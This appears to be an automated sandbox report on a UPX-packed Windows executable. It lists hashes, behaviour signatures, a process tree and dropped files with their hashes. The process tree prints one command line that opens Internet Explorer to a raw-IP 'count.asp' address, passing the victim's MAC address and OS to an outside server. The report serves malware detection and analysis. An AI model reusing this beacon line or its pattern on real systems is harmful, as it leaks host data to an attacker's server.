Overview

overview

7

Static

static

7

b6941b74ed...18.exe

windows7-x64

7

b6941b74ed...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    134s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 05:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe

  • Size

    55KB

  • MD5

    b6941b74ed311ebd834469cc47cbaa59

  • SHA1

    b47765e48e609afbca75453dfb3cdc1135df4c86

  • SHA256

    f7260634e8684ca281fcdf1454bbef0b0d2b9ae9d000d25ac7433bf6ddcf64df

  • SHA512

    29c1e68487f1c4ef30335a36f16fd4dd69d0f3f1867db9399fa075a627442a61847836d1310b9b954996831d56627949b793f967224c429749fdfec8e3bf6174

  • SSDEEP

    1536:qaREAVLhLiM/xhfMLzaLa6hIAsdxn6sM0TZMl9V4:BvLJTphfKp6hIAsdxn6sM0TZMl9V4

Score
7/10
discoveryupx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=c2-0d-c8-cb-8e-9e&os=Microsoft Windows XP&flag=fe3723d1d815447c360e4dbd987e8995&user=b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1356
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1356 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2608

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    5f0c62d586a3aab77dc0d7bd21c41786

    SHA1

    335fb93bab5f46e71486f0952a5abee1a885c596

    SHA256

    43cea28b8b753a5ec94502b793f1cb4ff64ffe2d2e32ff3c667ff8dcc9745c8b

    SHA512

    7a95d03f30864955f94a7c6a9ce2b852e35191b8e4c711f8ee5331bb3e05a570e1502f3eca1776543af3673e98d4ebc17ed2db0970c9a4d9bce43a752f32b7b7

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    92567effa335fc3a4f959c024e1bd511

    SHA1

    d6823021cf7530330dc387353c20b46687a26fb7

    SHA256

    66db7dea6cb79814874b00e2b83cf4db621966ba7c507f48f557f549aa292ced

    SHA512

    b29422978afd3da150fb7cf8e2c34973e4395c2643108e8a68fc654b27e5b4c910f114dedc5ca901d1d33fd939f66a7da053c84fb1022a9afc32515c60306757

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6512a4280ee89e3d677d879a19bb4924

    SHA1

    86b30710ed07118715537b29aa8690575c177da1

    SHA256

    8c26ef1a81ddfd9049dd79641fb558ee2925e03212989221daa17301c880508e

    SHA512

    c3adc9062aa4cee4a65c0eac0d66c2a954201f9de5578594e2cac4c4288a981b6d61507f1eb57f3e13f8d2be5a0509c66553cc3277f9a0a05c7aac9e8deca68a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    2ea9e351156205878c7c69aa7e84f05f

    SHA1

    09e712aa95691d051efbe1dac776049531e7e252

    SHA256

    5ce9e942733f1cc280d30768b0b44b2b3bfe3495373826d5b6a5c53895a91a99

    SHA512

    1f0d8d1ddcfefd69b6c90a1967803459be2fd288acfce9779cab6a4699a99c478629b724683b6fcaa5720ccb5efd99571ccda3a2be734234423fabaa83fa8f20

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    7e78fd93dbc14c8fcaf1bd0d9ee94c98

    SHA1

    4224e10041059b8aa298d6099cc93defe114b683

    SHA256

    032031504a0e7db09920172fdc7cba5e9b298d0be79d4939629510c7a44510ee

    SHA512

    fcd4e870d5066a6fd3af11dcafc66e5946d8cb7dc9c8dc85e509697022dac376ad9c1e1ddb920f6b1a7b08138ed6f7636fa55b3b8bf0efc91e590bcf092b1c5f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    999361d3df53a293a366a1cb424ac42a

    SHA1

    92bfbf0b6ae26ceec4536eae3b50f95859b61ab5

    SHA256

    3198e4a6a53a71ef9ee01a556a0c7af4544c91215691c55a8372a6cefdca1a32

    SHA512

    ba8f19f6d7be54f9d1eff7a38ea00cb9e02e926612731a4c740dabd7ec683721bd3981380e47bcb4cbe4491a1a9c4b908a6cbade37d3842c3928e7706c3cacc6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    883bcad101abfe86725e930720cc8351

    SHA1

    2c816f253e9487a1761ba3ad31d4177da029e687

    SHA256

    a33cfd0cf7699901cc639bd00f434ab809722c671fa82f1b86dcff45a06dfd4e

    SHA512

    a788d1506398bfbd158340b45893e415ef7a046a0371b469eedf0def86ccc46a45d5c16fd53e742ee4d74aefc43fc06a191fd6c4d523d668f1c7ec6018abe7ce

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    35282ab899759088bc413e1e1b2cbb53

    SHA1

    766f1287f537917812f041ae821613009f0bfa7b

    SHA256

    e8ac67056f0beafe0c0019a6874c6515ab6c6d5f52fbd7533f2e49b888f692ac

    SHA512

    086c55f9f4c51da3d480ce6adb86b2a780632a25732b5abd41ca1b14332fb14e565241b1e672afc807866c7b1804bf26e5b3f6f530d828ca8636754586a97b3a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6c697e6e3bcd53f841f74a79bd5f0667

    SHA1

    db41633802379f0064e2dc79e614266536d5d55b

    SHA256

    5cc8ead060a5f2b4bf5ff7b8793f5ddc87788ea834d6e11d3c297d788630a871

    SHA512

    acae3a4c61baefa22e519bd85e576257628fcfc5e23a4edcc58d3935ae86c181e4dd70d4d41591dca8f85c3f34a808dad1ac73bf5d36896e362241c1d88d1518

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    9cc85b6857329e804cc9845d05521899

    SHA1

    b9a8cd27948e2fe5bf727cdc99d782b209d11204

    SHA256

    01f2f4a9496701e4addc53c5ea8eda21c7c02f15d14e50a59fa826ccebfc8bd4

    SHA512

    fd12d984308400fa5d487515a3e3869db7c5cd0e74410d16bc62c3044af1224185a3da172eb9bd1d283369f89ef70bf918a2b1fca62766b113caef7ca3f51d1b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    bd28513c071a9825df774f754c7efcbf

    SHA1

    8fcaec25e4437ed8e098fe1a00bcbaf2305c65f5

    SHA256

    d4c49b5b55e3652eca98e5d929bb3416c2776a91cfec9d3fc8314b64ed88e8d7

    SHA512

    57d92e7faefe2347c04cc6af840e8b74ded94524c6d7a7960502a559884cc389e5e1803987c5260c2195d03bedeb9dc18a46a4cdd3a61b3cd171abda73918f3b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    d4bc5cfd52644ddc99f41836c4637217

    SHA1

    d2c1ca19f92606ed95a7b96dfb67c12e5b3aed2f

    SHA256

    6637dfcac0bb114cf9731ca890fd97140ba62dcc27b3fc293e088551895225c4

    SHA512

    587de2b69419a62dae9388b6db631fd014223a6b3b69cc06e0e228c1b4cdc200361f68d8728ad1cfd4311630acd441de27fd3456a94413a68c21d3507335e109

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6399982841b288a00ba3d2b0150e289b

    SHA1

    9df90befdbfb2f300ea78929170fb5b107e7766a

    SHA256

    4ab7033d592efa714c06f0ac85d99a5bceca855512e56ed67d751d51cc8d532a

    SHA512

    c3ca46e87381d2c8617c53a95975a3c91588888d9864eb0b1848558562f5fef872f7d1a1801fcfd3e6679e2296a4e2c347adef346b7a1abf577c9cb303112405

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    197467a8721cdf4a872a8a7317c6d419

    SHA1

    33224c0b8cb982afd324386ce334f4c8d5668f6b

    SHA256

    055930daa6e0c787a1ee8003ec2db9a83f3f0da1ae3165c40f38058b77a5f6e3

    SHA512

    f42c91463d03a68bef732bc549258838e82dfe00a2a053b20771f6b29bde8f547be255b6d3f86c8fd672a90d96cdbf410b5428de16ac07460a0dfd2e7e47378c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    f30689ec21391af4edbfef4a028aa498

    SHA1

    019d776c87759a06533405c0862ace4e79ee5d4e

    SHA256

    47fdf395642f543fd2ee5e88a0b37755cf73d90dc36298d0f221c4db61954899

    SHA512

    4dad4aa0b84adeda9d2e4af1d2b5ab933a0b7805c18d1a3577650fd0a576fddaebd14fc5ce90745698571a2480e758d283851a1c73d10b183e2012c45b46338b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    7aaf2c390c4a4162b71ab52ef44dca31

    SHA1

    de14a03a95cf86be4000bc98ea9f1874bad07656

    SHA256

    d7fe189cc1497176bbbe5a542b222fb45e757dfca89ddf1e17c0c3873dc8602b

    SHA512

    f93571630a117ed895fad3551f2ff7c3096b520e4ba3e3db07e8e922338fb5ed2b127edf0b61139108e351aaeb7649ba11b083359afed3840cedcbad064282d0

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b2f5c351071dfdb5a688007d2fc3faab

    SHA1

    71ed8318af6eddf5939a7f9189bd232942c13f23

    SHA256

    54d3940c43e10801dd0e7f1a553569e8404331d0344757e4f0ec9bad4245c50e

    SHA512

    a9632efaf3d3423ff9c39cba1445902bf8e9b9332cd02a63e009fa19e1b8a210bb02d71f64aa21d20b722660b288aff9e345be6aeaae89b741b5fefef72ec6cf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabAC78.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarADD2.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.fon
    Filesize

    3KB

    MD5

    ca0294359fd9a7a27616a18c22dbd68a

    SHA1

    12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

    SHA256

    af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

    SHA512

    8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

    Download Submit

  • C:\Users\Admin\Desktop\ÔÚÏßСÓÎÏ·.ani
    Filesize

    3KB

    MD5

    306bf5dd4f871ad098060620062e3cec

    SHA1

    918f88322d837cf9c2097b61c0e549525e405b31

    SHA256

    8cd07b033ea36f41814aa786303b5cc95d7b58f3e3731c26f0b60c4d5d4964dd

    SHA512

    fa02b6d82d2db7000848896216991525185be1ccb457fc7794d7518dbe52e5d2760013bc0354482b3c326f78f670e5593f61da8bc35dfb77c4eb806e0fb36341

    Download Submit

  • C:\b.txt
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\b.txt
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    878778e6ae273c74668c90ff5fc48431

    SHA1

    b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

    SHA256

    119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

    SHA512

    936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

    Download Submit

  • memory/2956-0-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2956-75-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download